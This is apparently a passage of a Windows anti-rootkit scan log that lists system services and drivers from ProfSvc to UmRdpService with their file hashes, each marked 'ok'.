12:54:57.0602 0x1004 [ 6E409D818C6B342544EAE741B1422B85, B4ADFB7809FC42C432C984C3AC13FAFD1B7AD53BCC7FB16E86371DE4C829DD1A ] ProfSvc C:\WINDOWS\system32\profsvc.dll
12:54:57.0649 0x1004 ProfSvc - ok
12:54:57.0680 0x1004 [ FC0141B4A5AD6D637D883C1A89FC45C5, DCE8942C02EEDAE7A57707CA60CAC3A8CD6BA68E6571E405CA882D4DD6D69E43 ] Psched C:\WINDOWS\system32\DRIVERS\pacer.sys
12:54:57.0712 0x1004 Psched - ok
12:54:57.0759 0x1004 [ 07D57B890DD5693A6AB660CBAE8F91B4, 934895A41C116056E22FE3298418332A9F4280F96E96EEE06C977A4925395674 ] PxHlpa64 C:\WINDOWS\system32\drivers\PxHlpa64.sys
12:54:57.0759 0x1004 PxHlpa64 - ok
12:54:57.0790 0x1004 [ A5B22EACF1DA28E19CC9F80D37978657, 9543615574D540AC825DBE8D1581DFC8CC0B7A1113420903F6747E3789EEACDA ] QRDCIO C:\WINDOWS\System32\drivers\QRDCIO.sys
12:54:57.0837 0x1004 QRDCIO - ok
12:54:57.0868 0x1004 [ DAA9DEE0A5D5F238C4EE54C2C7FB67C5, 7EC8C603BD92699AC35BDCD294F13BEE90D5C2C195FD93A3F16928BFCF53CA93 ] QWAVE C:\WINDOWS\system32\qwave.dll
12:54:57.0930 0x1004 QWAVE - ok
12:54:57.0962 0x1004 [ 83868EB2924E6BC21A54337C65D614D1, 8D1BE01EBD190231153B867C32120DC8FBFBD32050448A778134D435D76A0B07 ] QWAVEdrv C:\WINDOWS\system32\drivers\qwavedrv.sys
12:54:57.0993 0x1004 QWAVEdrv - ok
12:54:58.0009 0x1004 [ E94067155C8AA4EF134CB2528E0C9CD7, 6EEF603F64827AB138930DFE379BF8E48E64AE8AA5EE7B9E0CA369022BAAA2EA ] RadioShim C:\WINDOWS\System32\drivers\RadioShim.sys
12:54:58.0009 0x1004 RadioShim - ok
12:54:58.0055 0x1004 [ B337B1F1E82A83E20A1743E008E25C0F, A2E8AF041B4CAB78AEE28A2147A189FF0F9D2FCEFB167D60FBBA0A787A5A5BE7 ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
12:54:58.0071 0x1004 RasAcd - ok
12:54:58.0118 0x1004 [ 3EE5097945A7F680E320953271EB2D4F, 0B9F2B458177A654F65C5E862B7C55B35E20271B76D5E20A20F30D3223A1216F ] RasAgileVpn C:\WINDOWS\system32\DRIVERS\AgileVpn.sys
12:54:58.0149 0x1004 RasAgileVpn - ok
12:54:58.0180 0x1004 [ 044638489B4A5FE5334F46C5314A0826, E06CC2A9EF369794DAD69FBB5AFD1676D4283DDAB2AD5E3EFE454C473F62F955 ] RasAuto C:\WINDOWS\System32\rasauto.dll
12:54:58.0212 0x1004 RasAuto - ok
12:54:58.0227 0x1004 [ 1BD3022FD6E450B00DE560265638FD2A, 3878B443053DFFED62641BE8736891F426C7121EB8C4DB38FF0F218697133A6D ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
12:54:58.0274 0x1004 Rasl2tp - ok
12:54:58.0352 0x1004 [ F83B38FCD4F69157B3D158433FA149CC, AB103BD3E2B3B134CB355C556DF70BCF0CF4DB11EFF7DB4A9876D5AA43D81293 ] RasMan C:\WINDOWS\System32\rasmans.dll
12:54:58.0430 0x1004 RasMan - ok
12:54:58.0446 0x1004 [ 5247F308C4103CDC4FE12AE1D235800A, E567CD33CA1897D53795E071B7AFBAF98B2C8F725F8BED0BA90F5EF611520E48 ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
12:54:58.0477 0x1004 RasPppoe - ok
12:54:58.0509 0x1004 [ 41F631007A158FEBB67F0E2AD1601BBA, EB5EA7277F4178BC27E55BF850AEBCD84B6BED80B2383CFB29548824AAFED135 ] RasSstp C:\WINDOWS\system32\DRIVERS\rassstp.sys
12:54:58.0555 0x1004 RasSstp - ok
12:54:58.0587 0x1004 [ A1A5E79C0D1352AFDC08328A623DA051, 01546DDE6F1FF159A7EB7F2BF104910445D3D863F1F37DEA695579BA60D84280 ] rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
12:54:58.0649 0x1004 rdbss - ok
12:54:58.0696 0x1004 [ 6B21EBF892CD8CACB71669B35AB5DE32, 0AD8E14FEF16FB2559F5FC8AFBC9D49E4E24F43CF65F480DBF9FAB593269B419 ] rdpbus C:\WINDOWS\System32\drivers\rdpbus.sys
12:54:58.0743 0x1004 rdpbus - ok
12:54:58.0759 0x1004 [ 680C1DAE268B6FB67FA21B389A8B79EF, 856911F77BDD8830C3D683EBE8AF399FB3A54C7D8D0B34EA37D903377F0A39BD ] RDPDR C:\WINDOWS\system32\drivers\rdpdr.sys
12:54:58.0821 0x1004 RDPDR - ok
12:54:58.0852 0x1004 [ BC8A79C625568DDB7DCA49D0C2741A64, AB0A7ED9EC2282EC0356D27EA4F70515943E41C2112428B787636B8BEC278933 ] RdpVideoMiniport C:\WINDOWS\system32\drivers\rdpvideominiport.sys
12:54:58.0868 0x1004 RdpVideoMiniport - ok
12:54:58.0915 0x1004 [ A26AEC49F318FEE141DDDB2C5F99B3E6, 246AD79FF27E79DEDCB0AAA7C22A8EA6349DEDAC863413A1E378E68FD94C9C4F ] rdyboost C:\WINDOWS\system32\drivers\rdyboost.sys
12:54:58.0930 0x1004 rdyboost - ok
12:54:58.0977 0x1004 [ 615DFD97DEA56CE1C3A52185A3038FF8, 707BF5F9FAE478A12656D15013F507CC1335E7B72BD21CA99BB813CB95E37BC0 ] ReFS C:\WINDOWS\system32\drivers\ReFS.sys
12:54:59.0024 0x1004 ReFS - ok
12:54:59.0087 0x1004 [ 0CF7CB56BF2D5E9DBCEE0185CB626FAD, 2BD2E2FB1D2EADD1F70EF55E8523C353F95D4FEB1BAD5017FA4D94F790F27825 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
12:54:59.0102 0x1004 RemoteAccess - ok
12:54:59.0134 0x1004 [ AC8785B53F8436058C90450DA1840AE7, CC1FFC2713910211F8A6AD532DBB9253ACD188CBD784F1BE6613DF382825A3C1 ] RemoteRegistry C:\WINDOWS\system32\regsvc.dll
12:54:59.0180 0x1004 RemoteRegistry - ok
12:54:59.0212 0x1004 [ DC66AE45816614D2999DCD3834DCCC4E, 1C26225135E851DDD1307F52401DD7055B26B3F3B8FDD693B21042C2896E235A ] RFCOMM C:\WINDOWS\System32\drivers\rfcomm.sys
12:54:59.0227 0x1004 RFCOMM - ok
12:54:59.0274 0x1004 [ 65B9FDE300A6DECC03BA44C4616DCAD6, CAD992982733DD20282A3453DC4E554AE1FC077C35479C0CA4E8BC3A9DCD3BB0 ] RpcEptMapper C:\WINDOWS\System32\RpcEpMap.dll
12:54:59.0306 0x1004 RpcEptMapper - ok
12:54:59.0337 0x1004 [ A737B433ABAF3F2DCB2BD7B4CC582B26, 3B5706B0CF0969A9F82060FD4DCC745F2D83C066B663FE8A4F0F493B64032C9C ] RpcLocator C:\WINDOWS\system32\locator.exe
12:54:59.0384 0x1004 RpcLocator - ok
12:54:59.0446 0x1004 [ A6F17C299A03BAFEFB9257C462A19E00, EB68967D28355271897166D7B6FD963D1E546D3C24AE1AEAAC561F94357A9345 ] RpcSs C:\WINDOWS\system32\rpcss.dll
12:54:59.0477 0x1004 RpcSs - ok
12:54:59.0509 0x1004 [ 2D05A5508F4685412F2B89E8C2189ABC, 82F12B4E0E73411A121EFD35FBD3B44CBBC0AE96ACFBB45D8C3C3777E2EA320D ] rspndr C:\WINDOWS\system32\DRIVERS\rspndr.sys
12:54:59.0540 0x1004 rspndr - ok
12:54:59.0602 0x1004 [ BC1FD4C82BF2922A8A6E8661DD1B8CE8, 254A790F0F10AD15C7C585D2918D4333C577EED848BA9FE4E2C4498E32494418 ] RTL8168 C:\WINDOWS\system32\DRIVERS\Rt630x64.sys
12:54:59.0618 0x1004 RTL8168 - ok
12:54:59.0649 0x1004 [ C3FCFB3072F5AB95C31D4E80978C3CA1, 5F08B8A0151EC30594E12F432B2F3DA81DF1DB8E034DD032760FDB25B6B4FACA ] RTSPER C:\WINDOWS\system32\DRIVERS\RtsPer.sys
12:54:59.0665 0x1004 RTSPER - ok
12:54:59.0696 0x1004 [ 1A063730F221B2746FF00457AE17E4F0, 39A3C258CBFE3BC566C63528C9020A3BC9409736AE5289C08A7BA471D8409263 ] s3cap C:\WINDOWS\System32\drivers\vms3cap.sys
12:54:59.0712 0x1004 s3cap - ok
12:54:59.0743 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] SamSs C:\WINDOWS\system32\lsass.exe
12:54:59.0759 0x1004 SamSs - ok
12:54:59.0852 0x1004 [ AE406EB8F94C1048AFC42B1B125410E0, 4E16668436C84C9BF5E6CE204EE9693C060C1041DC50F007EB8E815F69197BE8 ] Samsung Link Service C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
12:54:59.0884 0x1004 Samsung Link Service - ok
12:54:59.0931 0x1004 [ C624A1B32211C3166EDB3F4AB02A30B7, 6B2A4607DB52D74242787ED9DF9067058983D310431D8612D2B0236E6201E681 ] sbp2port C:\WINDOWS\system32\drivers\sbp2port.sys
12:55:00.0165 0x1004 sbp2port - ok
12:55:00.0227 0x1004 [ 74A3B67F03877D06B09B1B40C5ED582E, A8FF9BF416F0BF365BFB4E1796859825C811A74B5E54DDDCE8345193BEEBE206 ] SCardSvr C:\WINDOWS\System32\SCardSvr.dll
12:55:00.0259 0x1004 SCardSvr - ok
12:55:00.0321 0x1004 [ 8B9C4D55B4A536FB01C360DDB9533574, 9B939FE68F6F9C171ED0D91E2CE1E67515295D34EC23606BCDFD097DCC8CFD4A ] ScDeviceEnum C:\WINDOWS\System32\ScDeviceEnum.dll
12:55:00.0368 0x1004 ScDeviceEnum - ok
12:55:00.0399 0x1004 [ 13BEA6C882D4D877A5A85CA149C86BC1, 8E9BE5C2A36D5881D9985C3A31309FE03966EA13A3541D3C5B542AB67FA0D55F ] scfilter C:\WINDOWS\system32\DRIVERS\scfilter.sys
12:55:00.0431 0x1004 scfilter - ok
12:55:00.0524 0x1004 [ 3151A020E03DDE31AAC49F35C5EFB4DB, 5ABB1103009979F86C862357E28F37C2744979F2C99F7CF6ABB4EB1B8416B3F6 ] Schedule C:\WINDOWS\system32\schedsvc.dll
12:55:00.0587 0x1004 Schedule - ok
12:55:00.0618 0x1004 [ 41C0D7B1A6D4AD119BA6AC0487EA5C8E, 516C2B34BA7507D0DA4148B4ABC0A8C36286570D4EA5C60B28647B1249C15018 ] SCPolicySvc C:\WINDOWS\System32\certprop.dll
12:55:00.0634 0x1004 SCPolicySvc - ok
12:55:00.0696 0x1004 [ C54B6B2170BF628FD42F799A66956D75, BCF460A124CAA6F1F1A9A7BCBDCC2D5E39B0404D96B7C9FFAC806E041782B91E ] sdbus C:\WINDOWS\System32\drivers\sdbus.sys
12:55:00.0712 0x1004 sdbus - ok
12:55:00.0743 0x1004 [ 0B1E929D11A8E358106955603FAC65E8, A5EC91BFC0873EC6AB1D0DB4E91654BD35339BD680E7E82DA2DC64996B4AE515 ] sdstor C:\WINDOWS\System32\drivers\sdstor.sys
12:55:00.0759 0x1004 sdstor - ok
12:55:00.0790 0x1004 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\WINDOWS\system32\drivers\secdrv.sys
12:55:00.0806 0x1004 secdrv - ok
12:55:00.0884 0x1004 [ 6627154693B6C2B8A59727F5B38728E8, F08251EE3436400295F120D48F3763E6F11BBF4132D674AD3E8112B6B3538455 ] seclogon C:\WINDOWS\system32\seclogon.dll
12:55:00.0931 0x1004 seclogon - ok
12:55:00.0962 0x1004 [ 81FE9A81EDF8016816C9E91FBFBF7D35, 87FB92A3D15F312F0B9C423EF851061A944B013E5668D8C9A441B4DC0EB690AF ] SENS C:\WINDOWS\System32\sens.dll
12:55:00.0977 0x1004 SENS - ok
12:55:01.0024 0x1004 [ 6E4012AE67F09F867EF620C8D5524C0B, 63933E51F8E413E63481369CE2F9FD224560550FBD3BD2B4573E9F4AD88708A2 ] SensrSvc C:\WINDOWS\system32\sensrsvc.dll
12:55:01.0102 0x1004 SensrSvc - ok
12:55:01.0134 0x1004 [ DB2FF24CE0BDD15FE75870AFE312BA89, 7DB0D978C92CD0A0A81F7AB46FE323B4929CEA01585B0F330921E6DFA7DE1B85 ] SerCx C:\WINDOWS\system32\drivers\SerCx.sys
12:55:01.0149 0x1004 SerCx - ok
12:55:01.0165 0x1004 [ 0044B31F93946D5D41982314381FE431, 95B8A94BA9EF770F29ACD5B23D447EC2B6CF1CB3D0030343BA1550AC31F6E2A5 ] SerCx2 C:\WINDOWS\system32\drivers\SerCx2.sys
12:55:01.0181 0x1004 SerCx2 - ok
12:55:01.0196 0x1004 [ 3CD600C089C1251BEEB4CD4CD5164F9E, D9F81951B4454B24E821E33ACA53A851A61F3135E8EC6FBE6761A1A3E1CDCBE2 ] Serenum C:\WINDOWS\System32\drivers\serenum.sys
12:55:01.0212 0x1004 Serenum - ok
12:55:01.0227 0x1004 [ D864381BC9C725FAB01D94C060660166, 132FED95222BBE3B0B25B3F1F0EFC5903D04564BD047BA4D2042AD51E3FDA724 ] Serial C:\WINDOWS\System32\drivers\serial.sys
12:55:01.0243 0x1004 Serial - ok
12:55:01.0274 0x1004 [ 148195AE95D9BC7375A08846439FDAC1, 3A2F78FD18AA7A6D659921E19335E943894530874AC5AB5E7219CEF28FA54F7A ] sermouse C:\WINDOWS\System32\drivers\sermouse.sys
12:55:01.0306 0x1004 sermouse - ok
12:55:01.0368 0x1004 [ 3A2F1A7472C3B7CC9B89C8516C726488, 9BCBBAC10C900EA7B30822B463A77EE5067F217C4B490857A09E5277983CB89B ] SessionEnv C:\WINDOWS\system32\sessenv.dll
12:55:01.0431 0x1004 SessionEnv - ok
12:55:01.0478 0x1004 [ 472B7A5AC181C050888DB454663DD764, C950A8615D57BFD455E18880398350642B2E1D6B951EC9754FD8D429F3418835 ] sfloppy C:\WINDOWS\System32\drivers\sfloppy.sys
12:55:01.0509 0x1004 sfloppy - ok
12:55:01.0540 0x1004 [ 8081FF3DAE8159FE8956B09BC29CE983, AC0F305AEE8B1AB2E1275F1D33EC1D2F3E23F234F831BD9D41F415A94A19D3AB ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
12:55:01.0587 0x1004 SharedAccess - ok
12:55:01.0634 0x1004 [ 7FD9A61A3523A61FC135D61D6E160314, 409E1CF7A62FD90CBC31AEAFBB7230B02DBEC6CFCA2D266D221A7643FAEBA13B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
12:55:01.0665 0x1004 ShellHWDetection - ok
12:55:01.0696 0x1004 [ 2F518D13DD6F3053837FE606F1A2EA1F, 64109296CE95BD233525688A350D575CF97B9464659AA07CF78B307B6ADBC835 ] SiSRaid2 C:\WINDOWS\system32\drivers\SiSRaid2.sys
12:55:01.0696 0x1004 SiSRaid2 - ok
12:55:01.0728 0x1004 [ 1AC9A200A9C49C4508F04AAFFCA34A3F, 972BCB2A39169155F74111FAC74ACCD8F50E34EADCF087833B0980827627BBF4 ] SiSRaid4 C:\WINDOWS\system32\drivers\sisraid4.sys
12:55:01.0728 0x1004 SiSRaid4 - ok
12:55:01.0790 0x1004 [ 3C84DCCE5B322F745A75CA8BA3A0F6B3, 1FB94A8A1C63D6FDB82E28ED5B696B3CB1F64183A89A3B5153B266C292CB7815 ] smphost C:\WINDOWS\System32\smphost.dll
12:55:01.0806 0x1004 smphost - ok
12:55:01.0853 0x1004 [ D0EB0DF8C603BBA084351A92732B1CBE, E24ED8F78EF41C1BC17386AE4BBCE0DC892C5B89B12C03FC9FB61D359B13F1B4 ] SNMPTRAP C:\WINDOWS\System32\snmptrap.exe
12:55:01.0868 0x1004 SNMPTRAP - ok
12:55:01.0931 0x1004 [ B45AE0970B2D66CCE756DE6989E23EEC, 8393CF2DC4F65CD48D4D7B3C8C2D29E26728593B652D6CEAB65B50AEDA0884B7 ] spaceport C:\WINDOWS\system32\drivers\spaceport.sys
12:55:01.0946 0x1004 spaceport - ok
12:55:01.0978 0x1004 [ F337BE11071818FC3F5DC2940B6BDE34, D5CFF00E5DF37045F71AEE101AC9B270EBB29F372F404757B58600E9966C7E4D ] SpbCx C:\WINDOWS\system32\drivers\SpbCx.sys
12:55:01.0993 0x1004 SpbCx - ok
12:55:02.0056 0x1004 [ 2E3976C857D7230EC8D2B2276E688255, C0A6A84369CB3E709A6FFEBED2B38AB62D731B79D052D6D6FA8EF855BC428778 ] Spooler C:\WINDOWS\System32\spoolsv.exe
12:55:02.0118 0x1004 Spooler - ok
12:55:02.0306 0x1004 [ C993A0B97BECD3AAF5158E3869878465, 8B86F37DEFCBE55DE507D830EC4980EBB39B3CCA30C2B3E76B588AAB282A50FC ] sppsvc C:\WINDOWS\system32\sppsvc.exe
12:55:02.0556 0x1004 sppsvc - ok
12:55:02.0634 0x1004 [ 8003E034E3EA0E29DA54215A770FC27C, 28AB1FDEA372D33540A26DAE413A10336409D33B91F51DC0AE144D451022A2A7 ] srv C:\WINDOWS\system32\DRIVERS\srv.sys
12:55:02.0681 0x1004 srv - ok
12:55:02.0743 0x1004 [ 00D8AC8E3053290BDE6EA2FB6810D2FC, 957FEF84CBBAE71829529AE99A1B24F52D7831BD666442D0132FBB825409A75D ] srv2 C:\WINDOWS\system32\DRIVERS\srv2.sys
12:55:02.0853 0x1004 srv2 - ok
12:55:02.0884 0x1004 [ D047CD668E6277FD80F0C613946F034C, BD0209E7FD89F9295D4DE48C9652DF2A2990277C16AFA473B96704B1CBD2F338 ] srvnet C:\WINDOWS\system32\DRIVERS\srvnet.sys
12:55:02.0931 0x1004 srvnet - ok
12:55:02.0993 0x1004 [ CF6C3037839CF78421A94F9060C2886F, CA98C180AE03F5BE8FEFFBA75BD98DEE2AD4FA975E1EF83215C9CD2476946811 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
12:55:03.0040 0x1004 SSDPSRV - ok
12:55:03.0056 0x1004 [ 198A737DBA666F4808D62E9A8277A6B7, 90B6E5E2ACE95D850C913A3A1DA1F966C44955C530004C228FA93B2A536F5C27 ] SstpSvc C:\WINDOWS\system32\sstpsvc.dll
12:55:03.0087 0x1004 SstpSvc - ok
12:55:03.0212 0x1004 [ 5252D7BC56E5E0ED715AEA8FE173A455, 1408B3E98B35A449434718777EE70595F0D306197A428279C6281D2F1953F259 ] ssudmdm C:\WINDOWS\system32\DRIVERS\ssudmdm.sys
12:55:03.0212 0x1004 ssudmdm - ok
12:55:03.0274 0x1004 [ 366DEA74BBA65B362BCCFC6FC2ADFD8B, 4D28122AB9D8DAB724021E6513B4474BD34FCEDF47769B1D27AC7551FCA002F8 ] stexstor C:\WINDOWS\system32\drivers\stexstor.sys
12:55:03.0290 0x1004 stexstor - ok
12:55:03.0353 0x1004 [ 63E9CE568CF1192771A5F0460DE7D2B9, C27B21FD2C14AD41A59EF62EB8AC95C08EB13CCB1CEECD8378B8CDD4DC352E69 ] stisvc C:\WINDOWS\System32\wiaservc.dll
12:55:03.0431 0x1004 stisvc - ok
12:55:03.0462 0x1004 [ 0ED2E318ABB68C1A35A8B8038BDB4C90, 5C3ABC245F4BCFE64E646D9C0E2F5E211244956C84D03084C71FF6A7E0CDED30 ] storahci C:\WINDOWS\system32\drivers\storahci.sys
12:55:03.0478 0x1004 storahci - ok
12:55:03.0493 0x1004 [ 8B9486B64E5FC17FB9CC04CA10B77A34, C1EAC9D27DC83E4C56B890D97988C3CCFAE3877309610601F2E3FFFE97686D43 ] storflt C:\WINDOWS\system32\drivers\vmstorfl.sys
12:55:03.0509 0x1004 storflt - ok
12:55:03.0540 0x1004 [ 6B06E2D11E604BE2B1A406C4CB3B90DE, 2DDEA1568A85AD64FCE5D10D348304FCD9BE6E96C2313353EF70A2933306D188 ] stornvme C:\WINDOWS\system32\drivers\stornvme.sys
12:55:03.0540 0x1004 stornvme - ok
12:55:03.0587 0x1004 [ A45F5AC9D8069D0EC66E3CA73103073B, 996788F1C58E016E8E5CF3FD1D220A3C40AFFD6C21361A34636415DB12E0D381 ] StorSvc C:\WINDOWS\system32\storsvc.dll
12:55:03.0618 0x1004 StorSvc - ok
12:55:03.0649 0x1004 [ 548759755BC73DAD663250239D7E0B9F, D31A05A8CE800B539420B6E545F1F4BF6E4B02EAF8366DE89CAF13A83C6CA48D ] storvsc C:\WINDOWS\system32\drivers\storvsc.sys
12:55:03.0665 0x1004 storvsc - ok
12:55:03.0696 0x1004 [ E395BE02F80A79A6CF973BA38DBB8135, 4C6F85B0EB8E7725BA720F9742561D229726C0D7C17505D1E79F19A5626F6325 ] svsvc C:\WINDOWS\system32\svsvc.dll
12:55:03.0728 0x1004 svsvc - ok
12:55:03.0775 0x1004 [ 65454187E0F8B6C0DCECB0287D06EC43, 87550000CF5B3C1DF3E69633934AFE8554AE40B6638F190D3185AD63F1D7A2EE ] swenum C:\WINDOWS\System32\drivers\swenum.sys
12:55:03.0775 0x0fdc Object required for P2P: [ 5CF5E80616F74B769AABCF76FEA791D1 ] avgntflt
12:55:03.0790 0x1004 swenum - ok
12:55:03.0837 0x1004 [ 1C71D72D4997A284128FBEE770726330, 21682BDE74A1108FED1124FB1EA35A03CBFA94ABE1B89CC0FADB4DD82596C43E ] swprv C:\WINDOWS\System32\swprv.dll
12:55:03.0884 0x1004 swprv - ok
12:55:03.0946 0x1004 [ 7E85DB0463AD2403AE84AD162B162279, 996C42ECAFC6E24C623068AFAFCC0A2612526333AF9315F7536C6D40C2570632 ] SysMain C:\WINDOWS\system32\sysmain.dll
12:55:04.0071 0x1004 SysMain - ok
12:55:04.0103 0x1004 [ D73DBBB96CEE90C2856164AAD8543425, D11ADB5D4C5DD355314CA656D375D0062CAE7462E866F94F1B26D5803F65DCB2 ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
12:55:04.0134 0x1004 SystemEventsBroker - ok
12:55:04.0181 0x1004 [ D6A71B95ACF71ACA63B67232059F1BCD, C5CEC032E7AB507500D1CC7A4E65DA6322412C798201A9D770CBDE892E50DFC8 ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
12:55:04.0212 0x1004 TabletInputService - ok
12:55:04.0243 0x1004 [ 5A5BAB1CA9621E73E25EE4744B67CDA6, 479EBD7BAE1E2AD431153FDC016742F7A8D824716EAB1A4CA87EBBD21D61DECD ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
12:55:04.0290 0x1004 TapiSrv - ok
12:55:04.0368 0x1004 [ 746DDF7D59AB8D721C88D48434597E8D, 78BDBAB8D1E86A11804FEB19B355C0FAD04ACE8DD4BDDFDADCE5461E259BCE82 ] Tcpip C:\WINDOWS\system32\drivers\tcpip.sys
12:55:04.0478 0x1004 Tcpip - ok
12:55:04.0571 0x1004 [ 746DDF7D59AB8D721C88D48434597E8D, 78BDBAB8D1E86A11804FEB19B355C0FAD04ACE8DD4BDDFDADCE5461E259BCE82 ] TCPIP6 C:\WINDOWS\system32\DRIVERS\tcpip.sys
12:55:04.0634 0x1004 TCPIP6 - ok
12:55:04.0665 0x1004 [ 41CF802064F72E55F50CA0A221FD36D4, 70ABCDF9E96611E8C83042C581575E26649FE479475E8E118CD3FF6CB1C84C3F ] tcpipreg C:\WINDOWS\system32\drivers\tcpipreg.sys
12:55:04.0743 0x1004 tcpipreg - ok
12:55:04.0775 0x1004 [ E0BD2D83875464FEEEB242CBA8B7E073, A3067165128F36035FA9F3CBA55CFED736E180C495497FA7332B3D97908C3D90 ] tdx C:\WINDOWS\system32\DRIVERS\tdx.sys
12:55:04.0790 0x1004 tdx - ok
12:55:04.0821 0x1004 [ 232D185D2337F141311D0CF1983E1431, 02EB56D3F26174AF1741C1A444CE30DE84D5BAF583C1A52C7A953BCC52445547 ] terminpt C:\WINDOWS\System32\drivers\terminpt.sys
12:55:04.0837 0x1004 terminpt - ok
12:55:04.0900 0x1004 [ C50997E282576DA492EBA66B059D4196, EBD793CB396F9503376207FA60353F5672DEDB620C8E01C8D6AE0030B3B03339 ] TermService C:\WINDOWS\System32\termsrv.dll
12:55:04.0946 0x1004 TermService - ok
12:55:04.0978 0x1004 [ 2180DBCE75B914E5E5BBFFFAAE97AA21, 8000AECC8855903DB50ABA7E304396D1FCEAE8DC9ADD4FC50275CF24B4D914DE ] Themes C:\WINDOWS\system32\themeservice.dll
12:55:04.0993 0x1004 Themes - ok
12:55:05.0025 0x1004 [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] THREADORDER C:\WINDOWS\system32\mmcss.dll
12:55:05.0040 0x1004 THREADORDER - ok
12:55:05.0071 0x1004 [ B5ED9CC61798C7D44BD535D40B89EFB5, 1BDCEAA9AF2096381870D92129C748F4EE06A1167ABA9367B9DD43BAF27E3F5B ] TimeBroker C:\WINDOWS\System32\TimeBrokerServer.dll
12:55:05.0134 0x1004 TimeBroker - ok
12:55:05.0212 0x1004 [ 80A2FC1A089A71F2DBE5D8394FFB009F, DEA30E751F6EA42E43E16869713FC7E37832B15DAFA0062B1798DFA476981385 ] TPM C:\WINDOWS\system32\drivers\tpm.sys
12:55:05.0228 0x1004 TPM - ok
12:55:05.0259 0x1004 [ 884113C2BB703FE806C8608B75F34831, 24DE5750CA4363455412BABB0B1FAB08497153E8F158ED44958F100410F93506 ] TrkWks C:\WINDOWS\System32\trkwks.dll
12:55:05.0275 0x1004 TrkWks - ok
12:55:05.0446 0x1004 [ 44A94FB4C76528D2382FFE04B05827C3, B0BCDF7CD1D65E61A9061D539D83527A89B69583958F8A26C6BF9766C1B61E0C ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
12:55:05.0493 0x1004 TrustedInstaller - ok
12:55:05.0509 0x1004 [ BF8F54CA37E9C9D6582C31C5761F8C93, 337C566792F6FB9B7FD5D1D4384B767CFE4CF5DBB2E4688CCC36CBB018A0DD0F ] TsUsbFlt C:\WINDOWS\system32\drivers\tsusbflt.sys
12:55:05.0556 0x1004 TsUsbFlt - ok
12:55:05.0618 0x1004 [ 20185BEB7512EDE4EFECDFA148AC9F99, 6F539478493C0F87F3DDF67A4A6D4D41E9474EEF21434E856350CE149A34EA9F ] TsUsbGD C:\WINDOWS\System32\drivers\TsUsbGD.sys
12:55:05.0650 0x1004 TsUsbGD - ok
12:55:05.0696 0x1004 [ E85916632CD3B9E9B546968DB950BF42, DECE3852C763CC6293C7D1B772296C43A0AE1E47BBCC4979C96B3B2AD70413F3 ] tunnel C:\WINDOWS\system32\DRIVERS\tunnel.sys
12:55:05.0728 0x1004 tunnel - ok
12:55:05.0759 0x1004 [ F6EEAD052943B5A3104C1405BB856C54, FE422813E6C1012E9F392EFF2AE4C6D3A4DBD9CB2BD5E6A5CAB57D4E89A29468 ] uagp35 C:\WINDOWS\system32\drivers\uagp35.sys
12:55:05.0759 0x1004 uagp35 - ok
12:55:05.0775 0x1004 [ FE6067B1FD4E63650C667B33D080565B, 2C330ED00E49BA55E25564230E0DFB8A35F2B5320EB18D4AF7CAACFA9A449044 ] UASPStor C:\WINDOWS\System32\drivers\uaspstor.sys
12:55:05.0790 0x1004 UASPStor - ok
12:55:05.0821 0x1004 [ 807F8CF3E973305FC435C61CBBEE2A49, 43CDEAC2BFC5091C11DFC0E7F7171AF9A598AE56CB056C3CF382AE7807F79EF0 ] UCX01000 C:\WINDOWS\System32\drivers\ucx01000.sys
12:55:05.0837 0x1004 UCX01000 - ok
12:55:05.0900 0x1004 [ C61EAF8E1E4B2F62BA4FDF457440B2C6, 961F76A789925234AC27F56AAE34556FA06088D71580B42C24B0BC209EAFD67E ] udfs C:\WINDOWS\system32\DRIVERS\udfs.sys
12:55:05.0962 0x1004 udfs - ok
12:55:05.0962 0x1004 [ 9578691F297E1B1F519970FE6D47CB21, 080C352AAF22A16A4F3C4AB4DCEA5BFA656457C73F735CEBA30516FDACCF6301 ] UEFI C:\WINDOWS\System32\drivers\UEFI.sys
12:55:05.0978 0x1004 UEFI - ok
12:55:06.0009 0x1004 [ A867F0F978EE64C87FADC3B100869EE4, 2686BE85F963D0D0BB275E92E5B543280D8742CF10772303E3189D0719B6A277 ] UI0Detect C:\WINDOWS\system32\UI0Detect.exe
12:55:06.0040 0x1004 UI0Detect - ok
12:55:06.0072 0x1004 [ 5EAB5117DDB24FC4D39E6FFFCF1837B9, 2BC709240867F161E94BE6625A04F478EAAA3EEE7BC7C37ED0DFA9EEA5928E98 ] uliagpkx C:\WINDOWS\system32\drivers\uliagpkx.sys
12:55:06.0087 0x1004 uliagpkx - ok
12:55:06.0103 0x1004 [ DA34C39A18E60E7C3FA0630566408034, 2F162504214053894C72760D9933D01DBF3578609FE5E2376C3272818599FE32 ] umbus C:\WINDOWS\System32\drivers\umbus.sys
12:55:06.0118 0x1004 umbus - ok
12:55:06.0134 0x1004 [ AE8294875E5446E359B1E8035D40C05E, AE0357BAB47C07C3576BC76951CD258C009BC5A1B93259D2122A841BD9CDA8FA ] UmPass C:\WINDOWS\System32\drivers\umpass.sys
12:55:06.0165 0x1004 UmPass - ok
12:55:06.0197 0x1004 [ A023F267A262D5DA6CE1436D9C5E8FD9, 92AD7AF91184C244A7E392F49663143193A80D5D81114546A00F18227DE31D23 ] UmRdpService C:\WINDOWS\System32\umrdp.dll
12:55:06.0212 0x0fdc Object send P2P result: true
12:55:06.0243 0x1004 UmRdpService - ok
